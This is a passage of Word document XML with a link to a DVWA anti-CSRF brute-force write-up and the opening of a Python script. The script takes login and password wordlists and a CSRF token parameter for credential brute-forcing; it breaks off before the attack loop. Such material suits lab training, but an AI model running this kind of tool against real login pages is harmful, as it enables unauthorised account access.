      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidRPr="00E01B85">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.nu11secur1ty.com/2015/11/dvwa-brute-force-high-level-anti-csrf.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="0083712C" w14:paraId="6712AE7B" w14:textId="77777777" w:rsidTr="0083712C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="041341DA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">#!/usr/bin/env </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>python3</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="71D1FA05" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1F718A01" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C80953" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="521AA17F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B27800" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="73B2834B" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>argparse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2263D8A6" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6B7B0A48" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A464BEA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="25DB2F3E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="64B03231" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="56826561" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="63782370" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="12F45A6E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">class </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bcolors</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433DE02A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="37CD798F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    HEADER = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>95m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60BD35AB" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="55C0CF57" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OKBLUE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>94m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60DF1DDC" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6A897848" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OKGREEN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>92m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D8498F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="228ABFE7" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    WARNING = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>93m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF0C94D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="13675449" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    FAIL = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>91m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1928AB" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="263A1226" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ENDC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD6F02F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7CC8ED46" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    BOLD = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>1m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43438B18" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="113BEA85" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    UNDERLINE = '#033[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>4m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A098C7" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="2611E76E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="17E83856" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="42C5F8C2" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>open_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE50930" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="509E40B1" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    return [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>item.replace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("\n", "") for item in open(path).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>readlines</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6224A05D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="3228F65D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="68801ACF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="15916CEA" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">parser = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>argparse.ArgumentParser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070C0E33" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="74896F0D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-u', '--</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">', help='post action </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57762C39" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6B8B7320" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-p', '--password', help='Single password to test', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCC8C75" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="45354BD4" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-P', '--passwords', help='Passwords wordlist file', type=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>argparse.FileType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('r'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AAF05D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="40D3EC4A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-l', '--login', help='Single login to test', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1C97D2" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6CF90AF5" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-L', '--logins', help='Logins wordlist file', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292657A2" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="3EFCBACB" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-c', '--</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>csrf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>', help='</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CSRF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> token POST parameter name', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0096C887" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="3397A129" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.add_argument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('-a', '--additional', help='JSON string for additional POST data', type=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0E6BA0" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parser.parse_args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5343B446" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6767CD2D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="143718D5" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="20C062EC" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>if args.url is None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F9FAC6A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7BA60637" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: URL not specified")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B497686" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="3C54C6F9" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B622590" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1F47B665" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1D2CF332" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="607A88F9" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.csrf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E5A10E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1F6085CE" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CSRF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> token POST parameter not specified")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54FA0301" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="16522F08" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E30E6F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="46ADB1EF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="108FF019" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7CFAB37D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C4BC65" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6E7C3D70" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: Cannot use both single password and password wordlist")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4DEE38" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="5BB8AFFC" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="574447FD" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="718A8EE5" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>elif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is None and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is  None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B98ED29" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="64CF3567" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: Single password or password wordlist not specified")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C40A5D4" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="5726A80E" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010A0C9D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7992893F" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>elif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A82828" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="1F1945B3" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>password_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>open_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(args.passwords.name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27939C3A" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="64DD1963" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1123CD46" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="2586B5E5" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>password_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = [ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BFCE643" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="701A6A89" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="4075ED93" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="0727F826" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.logins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="236771D2" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="5286389D" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: Cannot use both single login and login wordlist")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0236C923" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="0ACEFEFD" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4218D706" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="4DFDEAF8" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>elif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.logins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is None and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is  None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="212C08EF" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="315F6E53" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    print("ERROR: Single login or login wordlist not specified")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35183427" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="7C959960" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1229F695" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
          <w:p w14:paraId="6EE56B99" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>elif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args.logins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="725DB2A2" w14:textId="77777777" w:rsidR="0083712C" w:rsidRDefault="0083712C"/>
